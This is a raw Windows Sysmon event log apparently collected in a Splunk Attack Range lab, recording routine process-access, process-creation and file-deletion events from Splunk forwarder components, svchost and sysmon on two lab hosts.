10341000x8000000000000000810469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.968{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.953{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.452{0C1E0330-F878-60EB-E379-00000000D001}34282696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.266{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:23.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D316EABFF5B5832EE96004CC06FF8BE,SHA256=679210BC4F51DF71E560E5B09C79A173F0E462F3AFFF3D88463C3AD3C8F0AA03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:25.140{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF29C4807C06A2F5251364FDA2A8F41,SHA256=79DBB81040A59D23D3B18EA95CB0CC3913F530BEB2B3B43D1775A521632BB68E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.796{0C1E0330-F879-60EB-E579-00000000D001}33483920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 